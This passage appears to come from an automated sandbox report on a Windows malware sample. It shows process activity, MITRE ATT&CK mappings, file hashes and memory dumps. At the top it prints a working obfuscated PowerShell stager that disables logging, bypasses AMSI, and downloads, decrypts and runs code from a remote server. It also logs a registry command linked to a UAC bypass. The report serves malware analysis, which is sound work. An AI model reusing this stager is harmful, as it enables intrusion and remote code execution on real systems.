QB9AHsANwB9AHsANgB9AHsAOAB9AHsAMgB9AHsAMAB9AHsAOQB9AHsANQB9ACIAIAAtAGYAIAAnAG4ATABvAGcAZwAnACwAJwBpACcALAAnAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvACcALAAnAGEAYgBsAGUAUwBjAHIAJwAsACcARQBuACcALAAnAGcAJwAsACcAdABCACcALAAnAHAAJwAsACcAbAAnACwAJwBpAG4AJwApAF0APQAwAH0AJAB7AHYAYABBAEwAfQA9ACAAKAAgACAAJgAoACcAbABzACcAKQAgACAAVgBhAHIAaQBBAGIAbABFADoATgBlAGIAKQAuAHYAQQBMAHUARQA6ADoAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBXACcALAAnAE4AZQAnACkALgBJAG4AdgBvAGsAZQAoACkAOwAkAHsAdgBgAEEAbAB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEQAJwAsACcAQQBkACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsANAB9AHsAMQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAHAAdAAnACwAJwBsACcALAAnAEIAJwAsACcAZQBTAGMAcgBpACcALAAnAEUAbgBhAGIAJwApACsAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwBnAGcAJwAsACcAbABvAGMAawBMAG8AJwAsACcAaQBuAGcAJwApACwAMAApADsAJAB7AHYAYABBAGwAfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAZAAnACwAJwBBAGQAJwApAC4ASQBuAHYAbwBrAGUAKAAoACIAewA0AH0AewAyAH0AewA3AH0AewAzAH0AewA1AH0AewA2AH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAbgB2AG8AYwBhAHQAJwAsACcAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAJwBhAGIAbAAnACwAJwBTAGMAcgBpAHAAJwAsACcARQBuACcALAAnAHQAQgBsAG8AYwAnACwAJwBrAEkAJwAsACcAZQAnACkALAAwACkAOwAkAHsAQwBgAEEANAA3ADgAfQBbACgAKAAoACIAewAxADIAfQB7ADIAfQB7ADEAOQB9AHsAMQA2AH0AewAxADQAfQB7ADEAfQB7ADEANQB9AHsANgB9AHsANQB9AHsAMQAwAH0AewAyADAAfQB7ADEAMwB9AHsAMgAxAH0AewAzAH0AewAxADEAfQB7ADEANwB9AHsANwB9AHsAOQB9AHsAMQA4AH0AewA0AH0AewA4AH0AewAwAH0AIgAtAGYAJwBpAHAAdABCACcALAAnAE4ARQB7ADAAfQAnACwAJwBLACcALAAnAGkAYwByACcALAAnAGUAJwAsACcAcgBlAHsAMAAnACwAJwBvAGYAdAB3AGEAJwAsACcAMAAnACwAJwBsAGwAewAwAH0AUwBjAHIAJwAsACcAfQBXAGkAbgBkACcALAAnAH0AJwAsACcAbwBzAG8AZgB0ACcALAAnAEgAJwAsACcAbABpAGMAaQBlACcALAAnAE0AQQBDAEgASQAnACwAJwBTACcALAAnAEEATABfACcALAAnAHsAJwAsACcAbwB3AHMAewAwAH0AUABvAHcAZQByAFMAaAAnACwAJwBFAFkAXwBMAE8AQwAnACwAJwBQAG8AJwAsACcAcwB7ADAAfQBNACcAKQApACAALQBmACAAWwBDAGgAYQBSAF0AOQAyACkAKwAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBnAGkAbgBnACcALAAnAGwAbwAnACwAJwBjAGsATABvAGcAJwApAF0APQAkAHsAVgBgAEEAbAB9AH0ARQBsAHMARQB7ACAAKAAmACgAIgB7ADIAfQB7ADAAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBBACcALAAnAEkAYQBCAGwARQAnACwAJwBnAEUAdAAtAHYAJwAsACcAcgAnACkAIAAgACgAIgBvACIAKwAiADgAMgBKACIAKQAgACAAKQAuAHYAQQBsAFUAZQAuACIARwBFAFQARgBJAGUAYABsAGQAIgAoACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAHMAaQBnACcALAAnAHUAcgBlAHMAJwAsACcAbgBhAHQAJwApACwAJwBOACcAKwAoACIAewAzAH0AewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAYwAnACwAJwBpACcALAAnACwAUwB0AGEAdABpAGMAJwAsACcAbwBuAFAAdQBiAGwAJwApACkALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAdQBlACcALAAnAGEATAAnACwAJwBTAGUAdABWACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AE4AVQBgAEwATAB9ACwAKAAmACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACcATwBiAEoAZQBjACcALAAnAHQAJwAsACcATgBFAFcALQAnACkAIAAoACIAewA1AH0AewAyAH0AewA2AH0AewAzAH0AewAxAH0AewAwAH0AewA0AH0AIgAtAGYAIAAnAE4AJwAsACcAVAByAGkAJwAsACcAdABJACcALAAnAGUAcgBpAEMALgBIAGEAcwBoAFMARQBUAFsAUwAnACwAJwBHAF0AJwAsACcAQwBPAEwAbABFAEMAJwAsACcAbwBuAHMALgBHAGUATgAnACkAKQApAH0AJAB7AFIAYABlAGYAfQA9ACAAIAAoACAAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBpAFIAJwAsACcAZAAnACkAIABWAEEAcgBJAEEAQgBsAEUAOgAxAEkAcQA2ACAAKQAuAHYAYQBsAFUARQAuACIAQQBgAFMAYABzAGUATQBiAEwAeQAiAC4AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBHAGUAJwAsACcAVABUAFkAcABlACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsANwB9AHsAMQB9AHsANAB9AHsAMwB9AHsAOQB9AHsAMAB9AHsANQB9AHsAMQAwAH0AewAyAH0AewA2AH0AewA4AH0AIgAgAC0AZgAgACcAZQBtAGUAbgB0AC4AQQAnACwAJwB5AHMAdABlAG0AJwAsACcAdABpAG8AbgAuACcALAAnAG4AJwAsACcALgBNAGEAJwAsACcAdQB0AG8AJwAsACcAQQAnACwAJwBTACcALAAnAG0AcwBpACcALAAnAGEAZwAnACwAJwBtAGEAJwApACsAKAAiAHsAMB9AHsAMQB9ACIAIAAtAGYAIAAnAFUAJwAsACcAdABpAGwAcwAnACkAKQA7ACQAewByAGAAZQBGAH0ALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAJwBpAEUAJwAsACcARwBlAHQARgAnACwAJwBMAGQAJwApAC4ASQBuAHYAbwBrAGUAKAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGEAbQBzACcALAAnAGkASQBuAGkAdABGACcAKQArACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAZQBkACcALAAnAGEAaQBsACcAKQAsACgAIgB7ADQAfQB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAGkAYwAnACwAJwBjACwAUwB0AGEAdAAnACwAJwB1AGIAbABpACcALAAnAG4AUAAnACwAJwBOAG8AJwApACkALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAFYAYQBsACcALAAnAFMARQBUACcALAAnAHUAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAewBOAHUAYABMAEwAfQAsACQAewB0AGAAUgBVAEUAfQApADsAfQA7ACAAIAAkADAARQBTADYAOgA6ACIARQBYAHAARQBDAFQAYAAxADAAMABDAG8AbgB0AGAAaQBuAHUAZQAiAD0AMAA7ACQAewA0AGUAYAAxAGAAZQAxAH0APQAuACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAagBFAGMAVAAnACwAJwBiACcALAAnAEUAdwAtAE8AJwAsACcATgAnACkAIAAoACIAewAyAH0AewA0AH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AIgAgAC0AZgAgACcAZQBuAHQAJwAsACcALgBOAEUAdAAuAFcAJwAsACcAUwB5AFMAVABlACcALAAnAEMATABJACcALAAnAE0AJwAsACcARQBiACcAKQA7ACQAewBVAH0APQAoACIAewA5AH0AewAxAH0AewAxADMAfQB7ADIAfQB7ADcAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADEANAB9AHsAMQAyAH0AewA2AH0AewA1AH0AewAxADAAfQB7ADEANQB9AHsAMQAxAH0AewA4AH0AewAxADYAfQAiACAALQBmACcAdwBzACAAJwAsACcAbABsAGEAJwAsACcANQAuADAAIAAoAFcAJwAsACcATgBUACAANgAuACcALAAnAG4AZABvACcALAAnAFQAcgBpAGQAZQBuAHQALwA3AC4AJwAsACcAOwAgACcALAAnAGkAJwAsACcAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIAAnACwAJwBNAG8AegBpACcALAAnADAAJwAsACcAIAByACcALAAnACAAVwBPAFcANgA0ACcALAAnAC8AJwAsACcAMQA7ACcALAAnADsAJwAsACcARwBlAGMAawBvACcAKQA7ACQAewBTAGAARQBSAH0APQAkACgAIAAgACQAMwBiADIAOgA6ACIAVQBuAGAASQBjAGAAbwBkAGUAIgAuACIAZwBgAGUAdABgAHMAVABSAGkAbgBHACIAKAAgACgAIAAuACgAJwBsAHMAJwApACAAdgBBAHIASQBhAEIATABFADoATABqAE0AaQBxADYAKQAuAHYAQQBMAHUAZQA6ADoAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAJwBGAHIAbwAnACwAJwBNAEIAYQBTAEUAJwAsACcAaQBuAGcAJwAsACcANgA0AFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsANwB9AHsAMQAwAH0AewAyADEAfQB7ADMAfQB7ADQAfQB7ADIANQB9AHsAMQAzAH0AewA2AH0AewAyADIAfQB7ADAAfQB7ADIAMAB9AHsAMQAxAH0AewAxADgAfQB7ADEANQB9AHsAMgB9AHsAMQA0AH0AewAyADYAfQB7ADUAfQB7ADIANAB9AHsAMgAzAH0AewA4AH0AewA5AH0AewAxADIAfQB7ADEANwB9AHsAMQA2AH0AewAxAH0AewAxADkAfQAiAC0AZgAgACcAdwBCACcALAAnAE8AQQBBAHgAQQBBAD0AJwAsACcAQQAnACwAJwBRAEEAJwAsACcAYwBBAEEANgBBAEMAOABBAEwAJwAsACcAMABBACcALAAnAEEAJwAsACcAYQBBAEIAMAAnACwAJwBBAFoAJwAsACcAUQBCADMAQQBHAEUAQQBlAFEAJwAsACcAQQAnACwAJwBwAEEASABJAEEAWgBRACcALAAnAEEAdQBBAEcAJwAsACcAQgBvAEEASABBACcALAAnAGIAQQBCAHMAQQAnACwAJwBHAEUAJwAsACcAQQAnACwAJwA0AEEAWgBRAEIAMABBAEQAbwAnACwAJwBCADMAQQAnACwAJwA9ACcALAAnAHEAQQBDADQAQQBaAGcAQgAnACwAJwBIACcALAAnAGMAJwAsACcAQgBoAEEASABRACcALAAnAFoAdwAnACwAJwB3ACcALAAnAEMAJwApACkAKQApADsAJAB7AFQAfQA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBlAHcAJwAsACcAcwAuAHAAaABwACcALAAnAC8AbgAnACkAOwAkAHsANABFADEAYABFADEAfQAuACIASABFAEEARABgAEUAUgBTACIALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcARABkACcALAAnAEEAJwApAC4ASQBuAHYAbwBrAGUAKAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcALQBBAGcAZQBuAHQAJwAsACcAcwBlAHIAJwAsACcAVQAnACkALAAkAHsAVQB9ACkAOwAkAHsANABgAEUAMQBgAEUAMQB9AC4AIgBwAHIAbwBgAFgAeQAiAD0AIAAgACgALgAoACIAewAyAH0AewAzAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQBiAEwARQAnACwAJwBSAEkAJwAsACcAZwBlAFQALQBWACcALAAnAEEAJwApACAAKAAnAHIASABMACcAKwAnAG4AZQAnACsAJwBDACcAKQAgAC0AVgBBAEwAdQBlAG8AbgApADoAOgAiAEQARQBmAGAAQQB1AGwAVAB3AGUAYgBgAFAAYABSAE8AeABZACIAOwAkAHsANABgAEUAMQBgAEUAMQB9AC4AIgBwAHIAbwBgAHgAeQAiAC4AIgBjAHIARQBEAGAAZQBOAHQASQBgAEEATABTACIAIAA9ACAAIAAgACgALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAEkAJwAsACcAdgBBAFIAJwAsACcAYQBCAEwAZQAnACkAIAAgACgAIgBvACIAKwAiADYAYQA4AGwAIgApACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBkAEUAZgBgAEEAdQBMAHQAbgBlAHQAVwBPAFIAYABLAGMAcgBgAGUAYABkAGUATgB0AGAAaQBBAEwAUwAiADsAJAB7AHMAYwBSAGAASQBgAFAAVAA6AHAAcgBgAE8AeAB5AH0AIAA9ACAAJAB7ADQAYABlADEAZQAxAH0ALgAiAHAAUgBgAG8AWABZACIAOwAkAHsASwB9AD0AIAAkAEkAYwA5ADcAOgA6ACIAYQBTAGAAQwBpAGkAIgAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdABFAFMAJwAsACcAdABCAFkAJwAsACcARwBlACcAKQAuAEkAbgB2AG8AawBlACgAJwB9AGQAdABhAF0ARABZAD8AdQAmAEwASgAzAFoAYwBeAHoAUABJAHkAbQBlAGwALwB+AHsAUgAhADUAagBWADcAJwApADsAJAB7AHIAfQA9AHsAJAB7AEQAfQAsACQAewBLAH0APQAkAHsAYQBgAFIAZwBzAH0AOwAkAHsAUwB9AD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACYAKAAnACUAJwApAHsAJAB7AEoAfQA9ACgAJAB7AEoAfQArACQAewBTAH0AWwAkAHsAXwB9AF0AKwAkAHsAawB9AFsAJAB7AF8AfQAlACQAewBLAH0ALgAiAEMAYABvAFUAbgBUACIAXQApACUAMgA1ADYAOwAkAHsAUwB9AFsAJAB7AF8AfQBdACwAJAB7AHMAfQBbACQAewBKAH0AXQA9ACQAewBTAH0AWwAkAHsAagB9AF0ALAAkAHsAcwB9AFsAJAB7AF8AfQBdAH0AOwAkAHsAZAB9AHwALgAoACcAJQAnACkAewAkAHsASQB9AD0AKAAkAHsASQB9ACsAMQApACUAMgA1ADYAOwAkAHsAaAB9AD0AKAAkAHsASAB9ACsAJAB7AFMAfQBbACQAewBpAH0AXQApACUAMgA1ADYAOwAkAHsAUwB9AFsAJAB7AEkAfQBdACwAJAB7AHMAfQBbACQAewBIAH0AXQA9ACQAewBzAH0AWwAkAHsASAB9AF0ALAAkAHsAUwB9AFsAJAB7AGkAfQBdADsAJAB7AF8AfQAtAGIAeABPAFIAJAB7AHMAfQBbACgAJAB7AHMAfQBbACQAewBJAH0AXQArACQAewBzAH0AWwAkAHsAaAB9AF0AKQAlADIANQA2AF0AfQB9ADsAJAB7ADQARQAxAGAARQAxAH0ALgAiAGgARQBgAEEARABgAEUAUgBTACIALgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEQARAAnACwAJwBBACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAQwAnACwAJwBvAG8AawBpAGUAJwApACwAKAAiAHsAMQAwAH0AewAyAH0AewAxAH0AewA5AH0AewAwAH0AewAxADEAfQB7ADcAfQB7ADYAfQB7ADUAfQB7ADQAfQB7ADgAfQB7ADMAfQAiACAALQBmACAAJwArAEEAYgAnACwAJwBlACcALAAnAGwAWQAnACwAJwBWAG4AMgA3AGcAPQAnACwAJwBMACcALAAnAHkAJwAsACcAcQAnACwAJwBGAE0AaQAnACwAJwAxACcALAAnAD0AcQAvAEsAMgB6AHAASwBzAGoARwBhACcALAAnAFoAawBvAEcASgBWAFgAYQBZACcALAAnAC8AJwApACkAOwAkAHsAZABgAEEAdABBAH0APQAkAHsANABlAGAAMQBFADEAfQAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACcARABPAFcATgBsAE8AYQAnACwAJwBEAEQAJwAsACcAYQAnACwAJwBUAEEAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAcwBgAEUAUgB9ACsAJAB7AFQAfQApADsAJAB7AEkAVgB9AD0AJAB7AGQAYQBgAFQAQQB9AFsAMAAuAC4AMwBdADsAJAB7AGQAQQBgAFQAQQB9AD0AJAB7AEQAQQBgAFQAQQB9AFsANAAuAC4AJAB7AGQAYQBgAFQAYQB9AC4AIgBMAGUAYABOAEcAYABUAEgAIgBdADsALQBqAG8AaQBOAFsAQwBoAEEAcgBbAF0AXQAoACYAIAAkAHsAUgB9ACAAJAB7AEQAYABBAHQAQQB9ACAAKAAkAHsASQBWAH0AKwAkAHsASwB9ACkAKQB8AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEUAWAAnACwAJwBJACcAKQA=
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3680

C:\Windows\system32\reg.exe
reg delete HKCU\Software\Classes\ms-settings /f
3⤵
- Modifies registry class
- Modifies registry key
PID:3224

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Bypass User Account Control

T1088

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e1ec6dc193816432308918c816852bbf

SHA1
2bb912c1c3dc3e8e5de542ad4d8d98c27218f1de

SHA256
96a1e848c9c78d13f98fbc458b58da2b13c200d16248362705672133137323b0

SHA512
a2526a2d9357919187ea782769876a1c30e08798e0198519aed03261d2db9ecabad8bda422ca391615b00d45902fd8de6165aaec656b09eeb5fe1802337cf196

Download Submit
C:\Users\Admin\AppData\Local\Temp\62A7.tmp\62A8.tmp\62A9.bat
MD5
b07f82069680b2891164314108d122f2

SHA1
b52e5caf6409b2cce674efaa682f654771950a26

SHA256
e50e7295f32388cb6835da8cec37f42728c4bf911eef7c8a00baeaac847f3ee9

SHA512
f1b051012a65d8b11fc4b27a8399f34ea455b83a278b25450bd3c730901664db5e76109833113bb5834924d074790ef676e908598c3a611b1d048bd9a8758430

Download Submit
C:\Users\Admin\AppData\Local\Temp\668F.tmp\6690.tmp\6691.bat
MD5
192b7b3d073ae602bb0af4f2cde03542

SHA1
1d8d005a5fcf09e9f052f9c2746cfc837011012a

SHA256
583adbfdeb5c4499ce3407eaddbc0d734ee8b95e6bafdf6e3d0f89b8dc797d8e

SHA512
882548a4c0224346e829179a30baee83ba93019b47e6703c0f6dbba6a489800c1f6f5661afb0616df99f74b39a87e1f0b58bbeb0b61392fc46044418c944eab4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7AA5.tmp\7AA6.bat
MD5
62306dfd5af82e11a21035c369c81ca9

SHA1
aa6ada094c1515f71935d7ee177dd32a791b4d59

SHA256
1ae3241246b9622df9fdcc86d9c627d056637a358d34538639ccb911f401c739

SHA512
a784b6752bab922d4128be9a8bb55c3b493a948300d8c65659240a887b3a55e7d5b0d47ae450e1c03b62e58408f1225a4c55fcfd109ee90253d24403fae2d1e0

Download Submit
C:\Users\Admin\AppData\Roaming\Load.exe
MD5
e6952505d68d6a3f0e27344e0e5f13b6

SHA1
c99635248a2c413a3fd536b19666532b140399e3

SHA256
91576fd2e47c56e3c65d58f248d6855238bac7846da97431c5ff84c4c639597d

SHA512
48be46438293acaea4cb0a3ac6dcf0c71ca7e6b8bb4979cf993f08b63712d788e5bcb19a97a9ec5b3087d607e4c6040e2bcc7a80bc8ce5b5ecf7f09f1e7c9835

Download Submit
C:\Users\Admin\AppData\Roaming\Load.exe
MD5
e6952505d68d6a3f0e27344e0e5f13b6

SHA1
c99635248a2c413a3fd536b19666532b140399e3

SHA256
91576fd2e47c56e3c65d58f248d6855238bac7846da97431c5ff84c4c639597d

SHA512
48be46438293acaea4cb0a3ac6dcf0c71ca7e6b8bb4979cf993f08b63712d788e5bcb19a97a9ec5b3087d607e4c6040e2bcc7a80bc8ce5b5ecf7f09f1e7c9835

Download Submit
C:\Users\Admin\AppData\Roaming\run.exe
MD5
b26ddb9eb21e13b28557ad7f745bb782

SHA1
390da6c974d3ce01cd42580ec1993da4ab4a6d3c

SHA256
0cd515f95efb36d901d827e8ca4338a323ac545746b073088429b90ce35322f2

SHA512
f1fb566975ae3f83e4ac1e81202544e763788c3ae241a73ac6ec71bbd010d3bad9c00d79edaa3ba8eae520ab3534abd066faad4e08bc971a9bb1c31553b66fc8

Download Submit
C:\Users\Admin\AppData\Roaming\run.exe
MD5
b26ddb9eb21e13b28557ad7f745bb782

SHA1
390da6c974d3ce01cd42580ec1993da4ab4a6d3c

SHA256
0cd515f95efb36d901d827e8ca4338a323ac545746b073088429b90ce35322f2

SHA512
f1fb566975ae3f83e4ac1e81202544e763788c3ae241a73ac6ec71bbd010d3bad9c00d79edaa3ba8eae520ab3534abd066faad4e08bc971a9bb1c31553b66fc8

Download Submit
memory/204-8-0x0000000000000000-mapping.dmp

Download
memory/208-24-0x0000000000000000-mapping.dmp

Download
memory/212-7-0x0000000000000000-mapping.dmp

Download
memory/212-44-0x0000000000000000-mapping.dmp

Download
memory/360-40-0x0000000000000000-mapping.dmp

Download
memory/400-43-0x0000000000000000-mapping.dmp

Download
memory/400-4-0x0000000000000000-mapping.dmp

Download
memory/400-23-0x0000000000000000-mapping.dmp

Download
memory/504-45-0x0000000000000000-mapping.dmp

Download
memory/504-25-0x0000000000000000-mapping.dmp

Download
memory/652-32-0x0000000000000000-mapping.dmp

Download
memory/684-41-0x0000000000000000-mapping.dmp

Download
memory/808-12-0x0000000000000000-mapping.dmp

Download
memory/904-15-0x0000000000000000-mapping.dmp

Download
memory/984-5-0x0000000000000000-mapping.dmp

Download
memory/992-39-0x0000000000000000-mapping.dmp

Download
memory/1008-69-0x0000000000000000-mapping.dmp

Download
memory/1016-74-0x000002355D3A0000-0x000002355D3A1000-memory.dmp

Filesize
4KB

Download
memory/1016-78-0x0000023540913000-0x0000023540915000-memory.dmp

Filesize
8KB

Download
memory/1016-77-0x0000023540910000-0x0000023540912000-memory.dmp

Filesize
8KB

Download
memory/1016-66-0x0000000000000000-mapping.dmp

Download
memory/1016-10-0x0000000000000000-mapping.dmp

Download
memory/1016-68-0x00007FFE1FE90000-0x00007FFE2087C000-memory.dmp

Filesize
9.9MB

Download
memory/1124-56-0x0000017D548E6000-0x0000017D548E8000-memory.dmp

Filesize
8KB

Download
memory/1124-54-0x0000017D548E0000-0x0000017D548E2000-memory.dmp

Filesize
8KB

Download
memory/1124-53-0x0000017D6FB00000-0x0000017D6FB01000-memory.dmp

Filesize
4KB

Download
memory/1124-55-0x0000017D548E3000-0x0000017D548E5000-memory.dmp

Filesize
8KB

Download
memory/1124-52-0x0000017D6F950000-0x0000017D6F951000-memory.dmp

Filesize
4KB

Download
memory/1124-51-0x00007FFE1FE90000-0x00007FFE2087C000-memory.dmp

Filesize
9.9MB

Download
memory/1124-50-0x0000000000000000-mapping.dmp

Download
memory/1124-60-0x0000017D548E8000-0x0000017D548E9000-memory.dmp

Filesize
4KB

Download
memory/1176-30-0x0000000000000000-mapping.dmp

Download
memory/1296-33-0x0000000000000000-mapping.dmp

Download
memory/1404-31-0x0000000000000000-mapping.dmp

Download
memory/1452-67-0x0000000000000000-mapping.dmp

Download
memory/1452-29-0x0000000000000000-mapping.dmp

Download
memory/1984-48-0x0000000000000000-mapping.dmp

Download
memory/1984-28-0x0000000000000000-mapping.dmp

Download
memory/2012-46-0x0000000000000000-mapping.dmp

Download
memory/2216-6-0x0000000000000000-mapping.dmp

Download
memory/2256-34-0x0000000000000000-mapping.dmp

Download
memory/2432-37-0x0000000000000000-mapping.dmp

Download
memory/2704-27-0x0000000000000000-mapping.dmp

Download
memory/2716-42-0x0000000000000000-mapping.dmp

Download
memory/2768-47-0x0000000000000000-mapping.dmp

Download
memory/2780-61-0x0000018DDD0D0000-0x0000018DDD0D2000-memory.dmp

Filesize
8KB

Download
memory/2780-75-0x0000018DDD0D6000-0x0000018DDD0D8000-memory.dmp

Filesize
8KB

Download
memory/2780-59-0x00007FFE1FE90000-0x00007FFE2087C000-memory.dmp

Filesize
9.9MB

Download
memory/2780-76-0x0000018DDD0D8000-0x0000018DDD0D9000-memory.dmp

Filesize
4KB

Download
memory/2780-57-0x0000000000000000-mapping.dmp

Download
memory/2780-62-0x0000018DDD0D3000-0x0000018DDD0D5000-memory.dmp

Filesize
8KB

Download
memory/2820-21-0x0000000000000000-mapping.dmp

Download
memory/2824-22-0x0000000000000000-mapping.dmp

Download
memory/2912-83-0x0000000000000000-mapping.dmp

Download
memory/3084-35-0x0000000000000000-mapping.dmp

Download
memory/3084-2-0x0000000000000000-mapping.dmp

Download
memory/3224-14-0x0000000000000000-mapping.dmp

Download
memory/3480-26-0x0000000000000000-mapping.dmp

Download
memory/3480-9-0x0000000000000000-mapping.dmp

Download
memory/3508-73-0x0000000000000000-mapping.dmp

Download
memory/3556-49-0x0000000000000000-mapping.dmp

Download
memory/3676-19-0x0000000000000000-mapping.dmp

Download
memory/3680-81-0x0000000000000000-mapping.dmp

Download
memory/3680-82-0x00007FFE1FE90000-0x00007FFE2087C000-memory.dmp

Filesize
9.9MB

Download
memory/3680-86-0x0000018DBFA10000-0x0000018DBFA12000-memory.dmp

Filesize
8KB

Download
memory/3680-87-0x0000018DBFA13000-0x0000018DBFA15000-memory.dmp

Filesize
8KB

Download
memory/3712-18-0x0000000000000000-mapping.dmp

Download
memory/3768-38-0x0000000000000000-mapping.dmp

Download
memory/3780-17-0x0000000000000000-mapping.dmp

Download
memory/3808-36-0x0000000000000000-mapping.dmp

Download
memory/3920-20-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads